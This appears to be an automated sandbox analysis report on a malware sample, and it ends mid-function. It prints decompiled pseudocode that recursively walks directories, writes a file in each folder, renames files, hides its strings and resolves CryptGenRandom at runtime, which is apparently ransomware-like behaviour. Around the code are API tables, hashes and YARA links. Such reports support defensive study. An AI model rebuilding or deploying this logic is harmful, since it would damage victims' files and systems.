				intOrPtr* _t56;
				void* _t60;
				void* _t61;
				void* _t65;
				char* _t72;
				void* _t76;
				void* _t79;
				signed int _t81;
				intOrPtr _t82;
				void* _t85;

				_t79 = 0;
				_t37 = E004010BB(_t60, 5, 0x8ad7de22);
				_t38 =  *_t37( &_v8, 0, 0, 1, 0xf0000000); // executed
				if(_t38 == 0) {
					L17:
					return _t79;
				}
				_t65 = 0;
				_t76 = 0x1a;
				do {
					_t2 = _t65 + 0x61; // 0x61
					 *((char*)(_t85 + _t65 - 0x50)) = _t2;
					_t65 = _t65 + 1;
				} while (_t65 < _t76);
				_t82 = _a8;
				E00405C38( &_v56, _t82 + 1); // executed
				_t61 = E00405C7D( &_v56, _t82);
				if(_t61 != 0) {
					_v40 = 0x70797243;
					_v36 = 0x6e654774;
					_v32 = 0x646e6152;
					_v28 = 0x6d6f;
					_v26 = 0;
					_v24 = 0x61766441;
					_v20 = 0x32336970;
					_v16 = 0x6c6c642e;
					_v12 = 0;
					_t45 = GetModuleHandleA( &_v24);
					if(_t45 != 0) {
						L7:
						_t22 =  &_v40; // 0x70797243
						_t46 = GetProcAddress(_t45, _t22);
						if(_t46 == 0) {
							L16:
							_t47 = E004010BB(_t61, 5, 0x72760bb8);
							 *_t47(_v8, 0);
							E00405C6C( &_v56);
							goto L17;
						}
						if(_a12 != _t79) {
							_push(_a4);
							_push(_t82);
							_push(_v8);
							if( *_t46() == 0) {
								goto L16;
							}
							L15:
							_t79 = 1;
							goto L16;
						}
						_push(_t61);
						_push(_t82);
						_push(_v8);
						if( *_t46() == 0) {
							goto L16;
						}
						if(_t82 == 0) {
							goto L15;
						}
						_t72 = _a4;
						_t61 = _t61 - _t72;
						_t81 = 0x1a;
						do {
							 *_t72 =  *((intOrPtr*)(_t85 + ( *(_t61 + _t72) & 0x000000ff) % _t81 - 0x50));
							_t72 = _t72 + 1;
							_t82 = _t82 - 1;
						} while (_t82 != 0);
						goto L15;
					}
					_t21 =  &_v24; // 0x61766441
					_t45 = LoadLibraryA(_t21);
					if(_t45 == 0) {
						goto L16;
					}
					goto L7;
				}
				_t56 = E004010BB(_t61, 5, 0x72760bb8);
				 *_t56(_v8, _t61);
				E00405C6C( &_v56);
				return 0;
			}

0x0040c06d
0x0040c06f
0x0040c083
0x0040c087
0x0040c1a3
0x00000000
0x0040c1a3
0x0040c08f
0x0040c091
0x0040c092
0x0040c092
0x0040c095
0x0040c099
0x0040c09a
0x0040c09e
0x0040c0a8
0x0040c0b6
0x0040c0ba
0x0040c0e3
0x0040c0eb
0x0040c0f2
0x0040c0f9
0x0040c0ff
0x0040c103
0x0040c10a
0x0040c111
0x0040c118
0x0040c11c
0x0040c124
0x0040c134
0x0040c134
0x0040c139
0x0040c141
0x0040c185
0x0040c18f
0x0040c199
0x0040c19e
0x00000000
0x0040c19e
0x0040c146
0x0040c175
0x0040c178
0x0040c179
0x0040c180
0x00000000
0x00000000
0x0040c182
0x0040c184
0x00000000
0x0040c184
0x0040c148
0x0040c149
0x0040c14a
0x0040c151
0x00000000
0x00000000
0x0040c155
0x00000000
0x00000000
0x0040c157
0x0040c15a
0x0040c15e
0x0040c15f
0x0040c16b
0x0040c16d
0x0040c16e
0x0040c16e
0x00000000
0x0040c173
0x0040c126
0x0040c12a
0x0040c132
0x00000000
0x00000000
0x00000000
0x0040c132
0x0040c0c6
0x0040c0cf
0x0040c0d4
0x00000000

APIs

Part of subcall function 004010BB: LoadLibraryA.KERNEL32(15595754,?,00000000), ref: 0040136B

Part of subcall function 00405C38: VirtualAlloc.KERNELBASE(00000000,0040C0AD,00003000,00000040,00000000,?,?,0040C0AD,?,?,?,?,?,?,?,0040165A), ref: 00405C55

GetModuleHandleA.KERNEL32(0040181B,?,?,?,?,?,?,?,?,0040165A,00000000,00000020,00000001,00000000), ref: 0040C11C
LoadLibraryA.KERNEL32(Advapi32.dll), ref: 0040C12A
GetProcAddress.KERNEL32(00000000,CryptGenRandomAdvapi32.dll,?,?,?,?,?,?,0040165A,00000000,00000020,00000001,00000000), ref: 0040C139

Part of subcall function 00405C6C: VirtualFree.KERNELBASE(?,00000000,00008000,0040C1A3,?,?,?,?,?,?,0040165A,00000000,00000020,00000001,00000000), ref: 00405C76

Strings

CryptGenRandomAdvapi32.dll, xrefs: 0040C134, 0040C137
Advapi32.dll, xrefs: 0040C126, 0040C129

Memory Dump Source

Source File: 00000005.00000002.1855704108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1855692711.00400000.00000002.sdmp Download File
Associated: 00000005.00000002.1855724332.00411000.00000002.sdmp Download File
Associated: 00000005.00000002.1855736795.00413000.00000004.sdmp Download File
Associated: 00000005.00000002.1855752485.0041A000.00000002.sdmp Download File

Similarity

API ID: LibraryLoadVirtual$AddressAllocFreeHandleModuleProc
String ID: Advapi32.dll$CryptGenRandomAdvapi32.dll
API String ID: 4081504000-2152921537
Opcode ID: f0d00e48fd5577379eca1547b48ede40e2b995ddbbbee420ff605b7462582ad2
Instruction ID: 532b31068dc0f79eab31c1d4cdc0e370d8fb5fc33e04a5dbd860711d3c5cd179
Opcode Fuzzy Hash: f0d00e48fd5577379eca1547b48ede40e2b995ddbbbee420ff605b7462582ad2
Instruction Fuzzy Hash: 1141E931904249EAEF11DBA5DD85BEF7B79EF41300F10427AE901BA281DB749F05CA69

Uniqueness

Uniqueness Score: 100.00%

Function 00408A8F, Relevance: 7.7, APIs: 5, Instructions: 197
filestringUNIQUE

Download Yara Rule

C-Code - Quality: 60%

			E00408A8F(void* __ecx, void* __edx, WCHAR* _a4, intOrPtr _a8, signed int _a12) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				struct _WIN32_FIND_DATAW _v632;
				void* __ebx;
				void* _t40;
				signed int _t42;
				intOrPtr* _t46;
				void* _t49;
				intOrPtr* _t51;
				void* _t52;
				int _t54;
				intOrPtr* _t57;
				void* _t58;
				intOrPtr* _t59;
				intOrPtr* _t64;
				void* _t69;
				intOrPtr* _t70;
				void* _t75;
				void* _t77;
				void* _t80;
				void* _t106;
				void* _t114;
				void* _t115;
				WCHAR* _t116;
				void* _t117;

				_t114 = __edx;
				_v8 = _v8 & 0x00000000;
				_t116 = _a4;
				_t118 = _a12;
				if(_a12 != 0) {
					_t115 = 1;
					L5:
					_t40 = E00407F81(_t116); // executed
					__eflags = _t40;
					if(_t40 != 0) {
						L7:
						_a12 = _a12 & 0x00000000;
						_t42 = E00408E43(_t116,  &_a12); // executed
						__eflags = _a12;
						_v8 = _t42;
						if(_a12 != 0) {
							L25:
							return 0;
						}
						_a12 =  &(_t116[lstrlenW(_t116)]);
						_t46 = E004010BB(1, 1, 0x2ca1b5f0);
						 *_t46(_t116, "*");
						E004010BB(1, 1, 0xc91030c7);
						_t49 = FindFirstFileExW(_t116, 1,  &_v632, 0, 0, 2); // executed
						_t80 = _t49;
						__eflags = _t80 - 0xffffffff;
						if(_t80 == 0xffffffff) {
							E004010BB(_t80, 1, 0x32432452);
							_t75 = FindFirstFileW(_t116,  &_v632); // executed
							_t80 = _t75;
						}
						 *_a12 = 0;
						__eflags = _t80 - 0xffffffff;
						if(_t80 != 0xffffffff) {
							do {
								_t51 = E004010BB(_t80, 1, 0x2ca2b7f0);
								_t52 =  *_t51( &(_v632.cFileName), ".");
								__eflags = _t52;
								if(_t52 == 0) {
									goto L23;
								}
								_t57 = E004010BB(_t80, 1, 0x2ca2b7f0);
								_t58 =  *_t57( &(_v632.cFileName), L"..");
								__eflags = _t58;
								if(_t58 == 0) {
									goto L23;
								}
								_t59 = E004010BB(_t80, 1, 0x2ca1b5f0);
								 *_t59(_t116,  &(_v632.cFileName));
								__eflags = _v632.dwFileAttributes & 0x00000010;
								if((_v632.dwFileAttributes & 0x00000010) == 0) {
									E0040803D(_t114, _t116,  &_v632, _a8); // executed
									L21:
									_t117 = _t117 + 0xc;
									L22:
									__eflags = 0;
									 *_a12 = 0;
									goto L23;
								}
								__eflags = _t115;
								if(_t115 == 0) {
									_t64 = E004010BB(_t80, 1, 0x2ca1b5f0);
									_pop(_t106);
									 *_t64(_t116, "\\");
									_push(0);
									L18:
									_push(_a8);
									_push(_t116); // executed
									E00408A8F(_t106, _t114); // executed
									goto L21;
								}
								_v40 = 0xb0b47981;
								_v36 = 0x195b2388;
								_v32 = 0xb5dc07c;
								_v28 = 0x45b1c4ff;
								_v24 = 0x4ecaa74e;
								_v20 = 0x4ecaa746;
								_v16 = 0x50ea619;
								_v12 = 0xcbacfe14;
								_t69 = E0040C4EB(_t116, E00407563( &_v40));
								_t117 = _t117 + 0xc;
								__eflags = _t69;
								if(_t69 == 0) {
									goto L22;
								}
								_t70 = E004010BB(_t80, 1, 0x2ca1b5f0);
								_pop(_t106);
								 *_t70(_t116, "\\");
								_push(1);
								goto L18;
								L23:
								E004010BB(_t80, 1, 0x279deac1);
								_t54 = FindNextFileW(_t80,  &_v632); // executed
								__eflags = _t54;
							} while (_t54 != 0);
							E00407F69(_t80); // executed
							CloseHandle(_v8);
							goto L25;
						} else {
							E0040162C(_v8);
							return 0xdeadbeaf;
						}
					}
					__eflags =  *_t116 - 0x5c;
					if( *_t116 == 0x5c) {
						goto L25;
					}
					goto L7;
				}
				_t77 = E00408FD7(_t118, _t116,  &_v8); // executed
				_t115 = _v8;
				if(_t77 != 0 || _t115 != 0) {
					goto L5;
				} else {
					goto L25;
				}
			}

0x00408a8f
0x00408a98
0x00408aa0
0x00408aa4
0x00408aa9
0x00408ac7
0x00408ac9
0x00408aca
0x00408ad0
0x00408ad2
0x00408ade
0x00408ade
0x00408ae7
0x00408aec
0x00408af2
0x00408af5
0x00408cc4
0x00000000
0x00408cc4
0x00408b0b
0x00408b0e
0x00408b1b
0x00408b23
0x00408b39
0x00408b3b
0x00408b3d
0x00408b40
0x00408b49
0x00408b58
0x00408b5a
0x00408b5a
0x00408b61
0x00408b64
0x00408b67
0x00408b7c
0x00408b83
0x00408b96
0x00408b98
0x00408b9a
0x00000000
0x00000000
0x00408ba7
0x00408bba
0x00408bbc
0x00408bbe
0x00000000
0x00000000
0x00408bcb
0x00408bda
0x00408bdc
0x00408be3
0x00408c84
0x00408c89
0x00408c89
0x00408c8c
0x00408c8f
0x00408c91
0x00000000
0x00408c91
0x00408be9
0x00408beb
0x00408c66
0x00408c6c
0x00408c73
0x00408c75
0x00408c54
0x00408c54
0x00408c57
0x00408c58
0x00000000
0x00408c58
0x00408bf0
0x00408bf8
0x00408bff
0x00408c06
0x00408c0d
0x00408c14
0x00408c1b
0x00408c22
0x00408c30
0x00408c35
0x00408c38
0x00408c3a
0x00000000
0x00000000
0x00408c43
0x00408c49
0x00408c50
0x00408c52
0x00000000
0x00408c94
0x00408c9b
0x00408caa
0x00408cac
0x00408cac
0x00408cb5
0x00408cbe
0x00000000
0x00408b69
0x00408b6c
0x00000000
0x00408b72
0x00408b67
0x00408ad4
0x00408ad8
0x00000000
0x00000000
0x00000000
0x00408ad8
0x00408ab0
0x00408ab5
0x00408abc
0x00000000
0x00408ac2
0x00000000
0x00408ac2

APIs

Part of subcall function 00407F81: wsprintfW.USER32 ref: 00407FB4
Part of subcall function 00407F81: CreateFileW.KERNELBASE(00000200,40000000,00000000,00000000,00000001,00000000,00000000), ref: 00407FD3
Part of subcall function 00407F81: lstrlenW.KERNEL32(00000000,00000000,?,?,00408ACF,?,00000000,00000000,00000000), ref: 00407FEB
Part of subcall function 00407F81: WriteFile.KERNELBASE(00000000,00000000,?,?,00408ACF), ref: 00407FFB
Part of subcall function 00407F81: CloseHandle.KERNEL32(00000000), ref: 00408004
Part of subcall function 00407F81: GetLastError.KERNEL32(?,?,00408ACF,?,00000000,00000000,00000000), ref: 0040801A
Part of subcall function 00407F81: GetLastError.KERNEL32(?,?,00408ACF,?,00000000,00000000,00000000), ref: 00408021

Part of subcall function 00408E43: GetSystemTime.KERNEL32(00000400,?,00000001,00000001,?,?,?,?,?,?,?,?,00408AEC,?,00000000,00000000), ref: 00408E6B
Part of subcall function 00408E43: GetVolumeInformationW.KERNELBASE(00000000,00000200,00000100,00000600,00000608,00000604,00000400,00000100), ref: 00408ECD
Part of subcall function 00408E43: wsprintfW.USER32 ref: 00408F83
Part of subcall function 00408E43: CreateFileW.KERNELBASE(00000000,40000000,00000003,00000000,00000001,04000002,00000000), ref: 00408F9F
Part of subcall function 00408E43: GetLastError.KERNEL32 ref: 00408FAC

lstrlenW.KERNEL32(?,00000000,00000000,00000000), ref: 00408AFC

Part of subcall function 004010BB: LoadLibraryA.KERNEL32(15595754,?,00000000), ref: 0040136B

FindFirstFileExW.KERNELBASE(?,00000001,?,00000000,00000000,00000002), ref: 00408B39

Part of subcall function 00408A8F: FindFirstFileW.KERNELBASE(?,?), ref: 00408B58

Part of subcall function 0040803D: lstrlenW.KERNEL32(06590000,00000001,?,00000000), ref: 00408054
Part of subcall function 0040803D: lstrlenW.KERNEL32(00000010,00000001,?,00000000), ref: 00408065
Part of subcall function 0040803D: wsprintfW.USER32 ref: 004080E4
Part of subcall function 0040803D: wsprintfW.USER32 ref: 004080F7
Part of subcall function 0040803D: GetModuleHandleW.KERNEL32(00000000), ref: 004081A9
Part of subcall function 0040803D: GetProcAddress.KERNEL32(00000010,00000000), ref: 00408215
Part of subcall function 0040803D: MoveFileExW.KERNEL32(00000010,00000000,00000001), ref: 00408262

FindNextFileW.KERNELBASE(00000000,?), ref: 00408CAA

Part of subcall function 00407F69: FindClose.KERNELBASE(00408CBA,?,00408CBA,00000000), ref: 00407F7D

CloseHandle.KERNEL32(00000000), ref: 00408CBE

Memory Dump Source

Source File: 00000005.00000002.1855704108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1855692711.00400000.00000002.sdmp Download File
Associated: 00000005.00000002.1855724332.00411000.00000002.sdmp Download File
Associated: 00000005.00000002.1855736795.00413000.00000004.sdmp Download File
Associated: 00000005.00000002.1855752485.0041A000.00000002.sdmp Download File

Similarity

API ID: File$Findlstrlenwsprintf$CloseErrorHandleLast$CreateFirst$AddressInformationLibraryLoadModuleMoveNextProcSystemTimeVolumeWrite
String ID:
API String ID: 1648769047-0
Opcode ID: 8ed351cadd89ce2a5006e0372f06b4780250ad65640782815e0f466ce36f249f
Instruction ID: e257425d55aff4237a5dc0408af98a606bf6627403d20841c2a2722441289711
Opcode Fuzzy Hash: 8ed351cadd89ce2a5006e0372f06b4780250ad65640782815e0f466ce36f249f
Instruction Fuzzy Hash: C151F771505309AEEB14AB649D86FEF33B8DF04314F20016FF544B51C1EFB95A818A6D

Uniqueness

Uniqueness Score: 100.00%

Function 00408E43, Relevance: 7.6, APIs: 5, Instructions: 116
filetimeUNIQUE

Download Yara Rule

C-Code - Quality: 89%

			E00408E43(intOrPtr _a4, long* _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				char _v60;
				void* __ebx;
				WCHAR* _t30;
				WCHAR* _t33;
				intOrPtr* _t35;
				int _t42;
				WCHAR* _t45;
				void* _t57;
				signed int _t59;
				signed int _t60;
				WCHAR* _t72;
				WCHAR* _t74;

				_t60 = _t59 | 0xffffffff; // executed
				_t30 = E0040C6BA(0x410); // executed
				_t72 = _t30;
				if(_t72 != 0) {
					_t1 =  &(_t72[0x200]); // 0x400
					GetSystemTime(_t1);
					_t33 = E0040C6BA(0xe0c); // executed
					_t74 = _t33;
					if(_t74 != 0) {
						_t35 = E004010BB(_t60, 1, 0x78b00c68);
						 *_t35(_t74, 0x100);
						_t2 =  &(_t74[0x300]); // 0x600
						_t74[3] = 0;
						_t4 =  &(_t74[0x200]); // 0x400
						_t5 =  &(_t74[0x302]); // 0x604
						_t6 =  &(_t74[0x304]); // 0x608
						_t7 =  &(_t74[0x100]); // 0x200
						_t42 = GetVolumeInformationW(_t74, _t7, 0x100, _t2, _t6, _t5, _t4, 0x100); // executed
						if(_t42 != 0) {
							_v60 = 0x9ce68b7d;
							_v56 = 0xd28b2e87;
							_v52 = 0xc9fda87a;
							_v48 = 0x9d219bde;
							_v44 = 0x72c9f9ab;
							_v40 = 0x72c9f98b;
							_v36 = 0x8f94de6d;
							_v32 = 0xbd37fad3;
							_v28 = 0xf2af6d66;
							_v24 = 0x99b3b860;
							_v20 = 0xfd62cd1c;
							_v16 = 0x96293378;
							_v12 = 0xac75cb18;
							_v8 = 0x432c0490;
							_t45 = E00407563( &_v60);
							_t23 =  &(_t74[0x300]); // 0x600
							wsprintfW(_t72, _t45, _a4, _t72[0x200] & 0x0000ffff ^  *_t23 ^ 0x00000005, _t72[0x201] & 0x0000ffff ^  *_t23 ^ 0x00000006, _t72[0x202] & 0x0000ffff ^ 0x00000007, _t72[0x203] & 0x0000ffff ^ 0x00000008);
							_t57 = CreateFileW(_t72, 0x40000000, 3, 0, 1, 0x4000002, 0); // executed
							_t60 = _t57;
							if(_t60 == 0xffffffff && GetLastError() == 0x50) {
								 *_a8 = 1;
							}
						}
						E0040C6D1(_t74); // executed
					}
					E0040C6D1(_t72); // executed
				}
				return _t60;
			}

0x00408e50
0x00408e53
0x00408e58
0x00408e5d
0x00408e64
0x00408e6b
0x00408e76
0x00408e7b
0x00408e80
0x00408e8d
0x00408e9a
0x00408e9e
0x00408ea4
0x00408eae
0x00408eb5
0x00408ebc
0x00408ec5
0x00408ecd
0x00408ed5
0x00408ede
0x00408ee6
0x00408eed
0x00408ef4
0x00408efb
0x00408f02
0x00408f09
0x00408f10
0x00408f17
0x00408f1e
0x00408f25
0x00408f2c
0x00408f33
0x00408f3a
0x00408f41
0x00408f48
0x00408f83
0x00408f9f
0x00408fa5
0x00408faa
0x00408fba
0x00408fba
0x00408faa
0x00408fc1
0x00408fc6
0x00408fc8
0x00408fce
0x00408fd6

APIs

Part of subcall function 0040C6BA: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,00403FBE,00000202), ref: 0040C6C9

GetSystemTime.KERNEL32(00000400,?,00000001,00000001,?,?,?,?,?,?,?,?,00408AEC,?,00000000,00000000), ref: 00408E6B
GetVolumeInformationW.KERNELBASE(00000000,00000200,00000100,00000600,00000608,00000604,00000400,00000100), ref: 00408ECD
wsprintfW.USER32 ref: 00408F83
CreateFileW.KERNELBASE(00000000,40000000,00000003,00000000,00000001,04000002,00000000), ref: 00408F9F
GetLastError.KERNEL32 ref: 00408FAC

Part of subcall function 0040C6D1: VirtualFree.KERNELBASE(00000000,00000000,00008000,?,00408010,00000000,?,?,00408ACF,?,00000000,00000000,00000000), ref: 0040C6DE

Part of subcall function 004010BB: LoadLibraryA.KERNEL32(15595754,?,00000000), ref: 0040136B

Memory Dump Source

Source File: 00000005.00000002.1855704108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1855692711.00400000.00000002.sdmp Download File
Associated: 00000005.00000002.1855724332.00411000.00000002.sdmp Download File
Associated: 00000005.00000002.1855736795.00413000.00000004.sdmp Download File
Associated: 00000005.00000002.1855752485.0041A000.00000002.sdmp Download File

Similarity

API ID: Virtual$AllocCreateErrorFileFreeInformationLastLibraryLoadSystemTimeVolumewsprintf
String ID:
API String ID: 3215062400-0
Opcode ID: 09cb10d2212d924aab110ce0f6bbb03c8f9b932e27d2ce7747eb5f79f220e4ba
Instruction ID: f5f0e9f8480bd6b85d905596a42713df0b3d3e256417000faf6e11e3f2d68555
Opcode Fuzzy Hash: 09cb10d2212d924aab110ce0f6bbb03c8f9b932e27d2ce7747eb5f79f220e4ba
Instruction Fuzzy Hash: 4141DFB1900608AED720DFB0DD81BEFBBB9FF48710F10461AF651BA280DB7565418BA8

Uniqueness

Uniqueness Score: 100.00%

Function 00410B20, Relevance: 6.7, Strings: 5, Instructions: 473
UNIQUE

Download Yara Rule

C-Code - Quality: 74%

			E00410B20(void* __edx, void* __eflags, CHAR* __fp0) {
				void* __ebx;
				void* __edi;
				void* __ebp;
				intOrPtr _t152;
				intOrPtr* _t158;
				signed int* _t159;
				void* _t166;
				void* _t167;
				intOrPtr _t168;
				void* _t171;
				void* _t174;
				void* _t177;
				void* _t180;
				void* _t183;
				void* _t186;
				intOrPtr _t238;
				signed char _t242;
				signed int _t248;
				signed char _t252;
				void* _t263;
				signed char _t324;
				void* _t325;
				intOrPtr _t329;
				signed char _t338;
				signed char _t339;
				signed char _t340;
				signed char _t341;
				signed char _t342;
				intOrPtr* _t345;
				signed int* _t353;
				void* _t354;
				intOrPtr _t355;
				intOrPtr _t356;
				intOrPtr _t357;
				intOrPtr _t358;
				intOrPtr _t359;
				signed char _t361;
				void* _t363;
				intOrPtr* _t364;
				void* _t365;
				intOrPtr _t366;
				intOrPtr _t367;
				void* _t368;
				void* _t369;
				void* _t370;
				void* _t371;
				void* _t372;
				CHAR* _t396;

				_t396 = __fp0;
				_t336 = __edx;
				_t364 = _t365 - 0x34;
				_t366 = _t365 - 0x34;
				_push(0xffffffff);
				_push(E00435DC0);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t366;
				_t367 = _t366 - 0x16c;
				_push(_t263);
				_push(_t344);
				 *((intOrPtr*)(_t364 - 0x10)) = _t367;
				 *((intOrPtr*)(_t364 + 0x30)) = 0xf;
				 *(_t364 + 0x2c) = 0;
				 *(_t364 + 0x1c) = 0;
				 *(_t364 - 0x48) = 0;
				 *((char*)(_t364 - 0x44)) = 0;
				asm("xorps xmm0, xmm0");
				asm("movups [ebp-0x40], xmm0");
				 *(_t364 - 0x30) = 0;
				 *((char*)(_t364 - 0x2c)) = 0;
				 *(_t364 - 0x28) = 0;
				 *(_t364 - 0x24) = 0;
				 *((char*)(_t364 - 0x20)) = 0;
				 *(_t364 - 0x1c) = 0;
				 *(_t364 - 0x18) = 0;
				 *((char*)(_t364 - 0x14)) = 0;
				E00404400(_t364 - 0xc8);
				_push( *((intOrPtr*)(_t364 + 0x3c)));
				E004129F0(_t263, __edx, _t344);
				_t368 = _t367 + 4;
				 *(_t364 + 0x18) = 0;
				while(1) {
					_t152 =  *0x44d510; // 0x438f10
					_t19 = _t152 + 4; // 0x18
					_t20 =  *_t19 + 0x44d540; // 0x294728
					_t353 =  *( *_t20 + 4);
					 *(_t364 - 0x7c) = _t353;
					 *((intOrPtr*)( *_t353 + 4))();
					_t158 = E00403A70(_t263, _t336, _t344, _t364);
					_t369 = _t368 + 4;
					_t345 = _t158;
					_t337 =  *_t353;
					_t159 =  *((intOrPtr*)( *_t353 + 8))(_t364 - 0x80);
					if(_t159 != 0) {
						_t337 =  *_t159;
						 *( *_t159)(1);
					}
					L3:
					 *((char*)(_t364 - 0x4c)) =  *((intOrPtr*)( *((intOrPtr*)( *_t345 + 0x20))))(0xa);
					E00403580(_t337, 0x44d510, _t364 + 0x1c,  *((intOrPtr*)(_t364 - 0x4c)));
					_t370 = _t369 + 0xc;
					if( *(_t364 + 0x18) != 0) {
						__eflags =  *(_t364 + 0x18) - 1;
						if( *(_t364 + 0x18) != 1) {
							__eflags =  *(_t364 + 0x18) - 0x2800;
							if( *(_t364 + 0x18) <= 0x2800) {
								_push(0x10);
								_push(_t364);
								_t166 = E0040F4F0(_t263, _t337);
								_t370 = _t370 + 8;
								_t354 = _t166;
								_t167 = _t364 + 0x1c;
								__eflags = _t167 - _t354;
								if(_t167 != _t354) {
									_t329 =  *((intOrPtr*)(_t364 + 0x30));
									__eflags = _t329 - 0x10;
									if(_t329 >= 0x10) {
										__eflags = _t329 + 1;
										E0040D0E0(_t263, _t337, _t364,  *(_t364 + 0x1c), _t329 + 1);
									}
									 *((intOrPtr*)(_t364 + 0x30)) = 0xf;
									 *(_t364 + 0x2c) = 0;
									 *(_t364 + 0x1c) = 0;
									E004068C0(_t364 + 0x1c, _t354);
								}
								_t168 =  *((intOrPtr*)(_t364 + 0x14));
								__eflags = _t168 - 0x10;
								if(_t168 >= 0x10) {
									__eflags = _t168 + 1;
									E0040D0E0(_t263, _t337, _t364,  *_t364, _t168 + 1);
								}
							} else {
								_push( *((intOrPtr*)(_t364 + 0x3c)));
								E00411DD0();
								_t370 = _t370 + 4;
							}
						} else {
							E0040CD90(_t263, _t364 + 0x1c, _t364, "generate", 8);
							E004112E0(_t396,  *((intOrPtr*)(_t364 + 0x3c))); // executed
							_t370 = _t370 + 4;
						}
					} else {
						E0040CD90(_t263, _t364 + 0x1c, _t364, "update", 6);
					}
					_t270 =  >=  ?  *(_t364 + 0x1c) : _t364 + 0x1c;
					_t271 = ( >=  ?  *(_t364 + 0x1c) : _t364 + 0x1c) +  *(_t364 + 0x2c);
					_t170 =  >=  ?  *(_t364 + 0x1c) : _t364 + 0x1c;
					_push(1);
					_push(0x10);
					_t171 = E00402CC0(_t337, _t364,  >=  ?  *(_t364 + 0x1c) : _t364 + 0x1c, ( >=  ?  *(_t364 + 0x1c) : _t364 + 0x1c) +  *(_t364 + 0x2c), 0, 0x44c7b8);
					_t371 = _t370 + 0x18;
					if(_t171 == 0) {
						_t355 =  *((intOrPtr*)(_t364 + 0x30));
						__eflags = _t355 - 0x10;
						_t338 =  *(_t364 + 0x1c);
						_t344 =  >=  ? _t338 : _t364 + 0x1c;
						_t273 =  >=  ? _t338 : _t364 + 0x1c;
						_t173 =  *(_t364 + 0x2c) + ( >=  ? _t338 : _t364 + 0x1c);
						__eflags = _t355 - 0x10;
						_t275 =  >=  ? _t338 : _t364 + 0x1c;
						_push( >=  ? _t338 : _t364 + 0x1c);
						_t336 = _t364 - 0x48;
						_t174 = E00402D70(_t364 - 0x48, _t364,  >=  ? _t338 : _t364 + 0x1c,  *(_t364 + 0x2c) + ( >=  ? _t338 : _t364 + 0x1c), _t364 - 0x48, "8G)", 0);
						_t368 = _t371 + 0x18;
						__eflags = _t174;
						if(_t174 == 0) {
							_t356 =  *((intOrPtr*)(_t364 + 0x30));
							__eflags = _t356 - 0x10;
							_t339 =  *(_t364 + 0x1c);
							_t344 =  >=  ? _t339 : _t364 + 0x1c;
							_t277 =  >=  ? _t339 : _t364 + 0x1c;
							_t176 =  *(_t364 + 0x2c) + ( >=  ? _t339 : _t364 + 0x1c);
							__eflags = _t356 - 0x10;
							_t279 =  >=  ? _t339 : _t364 + 0x1c;
							_push( >=  ? _t339 : _t364 + 0x1c);
							_t336 = _t364 - 0x48;
							_t177 = E00402D70(_t364 - 0x48, _t364,  >=  ? _t339 : _t364 + 0x1c,  *(_t364 + 0x2c) + ( >=  ? _t339 : _t364 + 0x1c), _t364 - 0x48, 0x44c768, 0);
							_t368 = _t368 + 0x18;
							__eflags = _t177;
							if(_t177 == 0) {
								_t357 =  *((intOrPtr*)(_t364 + 0x30));
								__eflags = _t357 - 0x10;
								_t340 =  *(_t364 + 0x1c);
								_t344 =  >=  ? _t340 : _t364 + 0x1c;
								_t281 =  >=  ? _t340 : _t364 + 0x1c;
								_t179 =  *(_t364 + 0x2c) + ( >=  ? _t340 : _t364 + 0x1c);
								__eflags = _t357 - 0x10;
								_t283 =  >=  ? _t340 : _t364 + 0x1c;
								_push( >=  ? _t340 : _t364 + 0x1c);
								_t336 = _t364 - 0x48;
								_t180 = E00402D70(_t364 - 0x48, _t364,  >=  ? _t340 : _t364 + 0x1c,  *(_t364 + 0x2c) + ( >=  ? _t340 : _t364 + 0x1c), _t364 - 0x48, "p`)", 0);
								_t368 = _t368 + 0x18;
								__eflags = _t180;
								if(_t180 == 0) {
									_t358 =  *((intOrPtr*)(_t364 + 0x30));
									__eflags = _t358 - 0x10;
									_t341 =  *(_t364 + 0x1c);
									_t344 =  >=  ? _t341 : _t364 + 0x1c;
									_t285 =  >=  ? _t341 : _t364 + 0x1c;
									_t182 =  *(_t364 + 0x2c) + ( >=  ? _t341 : _t364 + 0x1c);
									__eflags = _t358 - 0x10;
									_t287 =  >=  ? _t341 : _t364 + 0x1c;
									_push( >=  ? _t341 : _t364 + 0x1c);
									_t336 = _t364 - 0x48;
									_t183 = E00402D70(_t364 - 0x48, _t364,  >=  ? _t341 : _t364 + 0x1c,  *(_t364 + 0x2c) + ( >=  ? _t341 : _t364 + 0x1c), _t364 - 0x48, 0x44c7a4, 0);
									_t372 = _t368 + 0x18;
									__eflags = _t183;
									if(_t183 == 0) {
										_t359 =  *((intOrPtr*)(_t364 + 0x30));
										__eflags = _t359 - 0x10;
										_t342 =  *(_t364 + 0x1c);
										_t344 =  >=  ? _t342 : _t364 + 0x1c;
										_t289 =  >=  ? _t342 : _t364 + 0x1c;
										_t185 =  *(_t364 + 0x2c) + ( >=  ? _t342 : _t364 + 0x1c);
										__eflags = _t359 - 0x10;
										_t291 =  >=  ? _t342 : _t364 + 0x1c;
										_push( >=  ? _t342 : _t364 + 0x1c);
										_t336 = _t364 - 0x48;
										_t186 = E00402D70(_t364 - 0x48, _t364,  >=  ? _t342 : _t364 + 0x1c,  *(_t364 + 0x2c) + ( >=  ? _t342 : _t364 + 0x1c), _t364 - 0x48, 0x44c77c, 0);
										_t368 = _t372 + 0x18;
										__eflags = _t186;
										if(_t186 == 0) {
											E00403510(_t364, __eflags, E00401950(0x44d578, "Err: Invalid command"));
											_t368 = _t368 + 0xc;
											 *(_t364 + 0x18) =  *(_t364 + 0x18) + 1;
										} else {
											 *(_t364 - 4) = 8;
											asm("wait");
											E00405640(E00405600(_t364 - 0x48, 1), _t364 - 0x64);
											_push(1);
											_push(0x40);
											_push(2);
											_push(_t364 - 0x64);
											E00404190(_t263, _t364 - 0x178, _t336);
